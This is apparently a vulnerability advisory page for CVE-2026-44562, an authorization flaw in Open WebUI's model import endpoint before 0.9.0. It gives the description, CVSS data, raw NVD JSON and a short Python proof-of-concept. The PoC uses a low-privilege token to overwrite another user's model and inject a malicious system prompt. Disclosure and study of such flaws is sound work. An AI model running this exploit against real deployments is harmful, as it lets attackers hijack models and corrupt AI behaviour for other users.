Security Vulnerability Report
中文
CVE-2026-44562 CVSS 6.5 MEDIUM

CVE-2026-44562

Published: 2026-05-15 20:16:48
Last Modified: 2026-05-15 20:16:48
Source: [email protected]

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the POST /api/v1/models/import endpoint allows users with the workspace.models_import permission to overwrite any existing model in the database, regardless of ownership. When an imported model's ID matches an existing model, the endpoint merges the attacker's payload over the existing model data and writes it to the database with no ownership or access grant validation. Additionally, filter_allowed_access_grants is never called, bypassing the access grant restrictions enforced on all other model mutation endpoints. This vulnerability is fixed in 0.9.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Target configuration target_url = "http://target-domain.com/api/v1/models/import" # Headers with a low-privilege token that has 'workspace.models_import' permission headers = { "Authorization": "Bearer <ATTACKER_TOKEN>", "Content-Type": "application/json" } # Malicious payload targeting an existing model ID to overwrite it malicious_payload = { "id": "target-model-id", "name": "Hijacked Model", "params": { "system": "Injected malicious system prompt" } } # Send exploit request response = requests.post(target_url, headers=headers, data=json.dumps(malicious_payload)) if response.status_code == 200: print("[+] Exploit successful: Model data overwritten.") else: print(f"[-] Exploit failed with status code: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44562", "sourceIdentifier": "[email protected]", "published": "2026-05-15T20:16:47.873", "lastModified": "2026-05-15T20:16:47.873", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the POST /api/v1/models/import endpoint allows users with the workspace.models_import permission to overwrite any existing model in the database, regardless of ownership. When an imported model's ID matches an existing model, the endpoint merges the attacker's payload over the existing model data and writes it to the database with no ownership or access grant validation. Additionally, filter_allowed_access_grants is never called, bypassing the access grant restrictions enforced on all other model mutation endpoints. This vulnerability is fixed in 0.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-283"}, {"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-mqq6-cqcx-38vg", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.